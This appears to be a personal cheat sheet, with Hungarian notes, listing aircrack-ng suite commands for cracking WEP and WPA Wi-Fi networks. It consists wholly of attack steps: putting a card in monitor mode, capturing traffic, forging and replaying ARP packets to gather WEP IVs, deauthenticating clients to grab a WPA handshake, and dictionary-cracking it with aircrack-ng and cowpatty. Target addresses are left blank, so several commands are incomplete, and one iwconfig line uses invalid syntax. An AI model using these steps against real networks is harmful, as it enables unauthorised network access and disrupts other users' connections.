WEP --- airmon-ng start wlan0 airodump-ng mon0 airodump-ng --bssid --channel --ivs -w mon0 aireplay-ng -5 -b mon0 aireplay-ng -1 1 -a mon0 packetforge-ng -0 -a -h -l 255.255.255.255 -k 255.255.255.255 -y -w arpy aireplay-ng -3 -r arpy -b mon0 aircrack-ng -06.ivs WPA --- airmon-ng airmon-ng start wlan0 iwconfig wlan0 mode monitoring ifconfig wlan0 up airodump-ng wlan0 ^C airodump-ng -w capture -c 3 --bssid wlan0 uj shell ablak iwconfig wlan0 channel aireplay-ng -0 1 -a -c wlan0 1. modszer a jelszo kitalalasara cd /pentest/wireless/aircrack-ng/test aircrack-ng -w password.lst /root/capture-01.cap 2. modszer cd /pentest/wireless/cowpatty ./cowpatty -r /root/capture-01.cap -f dict -s